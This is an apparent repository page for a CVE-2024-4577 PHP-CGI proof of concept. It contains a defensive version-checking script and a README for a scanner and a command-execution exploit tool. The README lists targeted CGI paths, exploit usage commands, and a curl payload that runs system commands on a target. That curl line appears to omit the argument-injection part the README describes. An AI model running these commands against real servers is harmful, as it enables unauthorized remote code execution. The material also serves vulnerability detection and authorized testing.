
CVE-2024-4577 PoC — Argument Injection in PHP-CGI

Associated Vulnerability
Title: Argument Injection in PHP-CGI (CVE-2024-4577)
Description: In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in the command line given to Win32 API functions. The PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to the PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
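A patch-state check built from the affected-version list in the description above, added here as an example and not part of this repository: it pulls a PHP version out of `php -v` output or an `X-Powered-By` header and classifies it against the quoted ranges. The sample strings are constructed; a version inside a listed range is a necessary condition only, since the description also requires Windows, Apache with PHP-CGI and a code page subject to Best-Fit mapping.

```python
import re
from typing import Optional

# Fixed versions per branch, taken from the CVE-2024-4577 description:
# 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8 are affected.
FIXED_IN = {
    (8, 1): (8, 1, 29),
    (8, 2): (8, 2, 20),
    (8, 3): (8, 3, 8),
}

# Matches "PHP 8.2.19 (cgi-fcgi) ..." from `php -v` and "PHP/8.3.8" from headers.
VERSION_RE = re.compile(r"PHP/?\s*(\d+)\.(\d+)\.(\d+)")


def parse_php_version(text: str) -> Optional[tuple]:
    """Return (major, minor, patch) found in text, or None when absent."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(part) for part in m.groups())


def cve_2024_4577_status(version: tuple) -> str:
    """Classify a version triple against the ranges quoted in the description.

    'vulnerable' / 'patched' for the three listed branches; 'unlisted' for any
    other branch, which this check deliberately does not clear (the description
    says nothing about them, so treat them as needing a separate review).
    """
    branch = version[:2]
    if branch not in FIXED_IN:
        return "unlisted"
    return "patched" if version >= FIXED_IN[branch] else "vulnerable"


def assess(text: str) -> str:
    """Convenience wrapper: raw banner or header in, status string out."""
    version = parse_php_version(text)
    return "unknown" if version is None else cve_2024_4577_status(version)


# Constructed sample inputs (not captured from a real host).
SAMPLES = {
    "php -v banner": "PHP 8.2.19 (cgi-fcgi) (built: May  7 2024 16:31:19) (NTS Visual C++ 2019 x64)",
    "patched header": "X-Powered-By: PHP/8.3.8",
    "unlisted branch": "X-Powered-By: PHP/8.0.30",
}

if __name__ == "__main__":
    for label, sample in SAMPLES.items():
        print(f"{label:16} -> {assess(sample)}")
```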
Readme
# CVE-2024-4577 - PHP CGI Argument Injection RCE

## Summary

CVE-2024-4577 is a critical **PHP CGI argument injection vulnerability** that affects Windows systems running PHP in CGI mode. This flaw allows remote attackers to **inject arguments** into PHP's command line via specially crafted URLs, leading to **remote code execution (RCE)**.

This repository includes:

- `CVE-2024-4577.py`: A **scanner** to detect vulnerable targets.
- `exploit.py`: An **exploit tool** that sends PHP code and executes system commands on the vulnerable server.

> ⚠️ **DISCLAIMER**  
> This project is for **educational and authorized testing** only. Any misuse of this code is not the responsibility of the author. Use responsibly and only in environments you own or have explicit permission to test.

---

## Requirements

- Python 3.x
- `requests` library

Install dependencies:

```bash
pip install -r requirements.txt
```
---

# Scanner Usage

Detect if a target is vulnerable to CVE-2024-4577:

## Single Target
```bash
python3 CVE-2024-4577.py -u http://target.com
```
![1](https://github.com/user-attachments/assets/2877a065-f568-4c9b-8b87-1bb220f1b904)

## Multiple Targets from File
```bash
python3 CVE-2024-4577.py -f urls.txt
```
![2](https://github.com/user-attachments/assets/45dbd725-4e57-4c3a-a33a-27a3ef3d6547)

## Custom Path (optional)
```bash
python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php
```
### Example Vulnerable Paths
The scanner and exploit test common CGI endpoints like:
```text
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello
```
The payload bypasses `cgi.force_redirect` and prepends malicious PHP using `php://input`.

---
# Exploit Usage

Execute arbitrary system commands on a vulnerable target:

## Single Target
```bash
python3 exploit.py -u http://target.com -c "id"
```
![4](https://github.com/user-attachments/assets/027fe98c-4b0e-4729-8844-dddb460d3eb8)

## Multiple Targets from File
```bash
python3 exploit.py -f urls.txt -c "id"
```
![5](https://github.com/user-attachments/assets/01de96c5-09e8-4065-b162-484985834c01)
---
## Using curl

You can also exploit the vulnerability manually using curl:
```bash
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"
```
This sends a PHP payload that executes `uname -a` on the server and returns the output.

![3](https://github.com/user-attachments/assets/fd134d72-7849-481c-b1ce-45e63ba61187)
---

# License

This code is released under the MIT License. See LICENSE for more information.

---

## Official Channels

- [YouTube @rootctf](https://www.youtube.com/@rootctf)
- [X @r0otk3r](https://x.com/r0otk3r)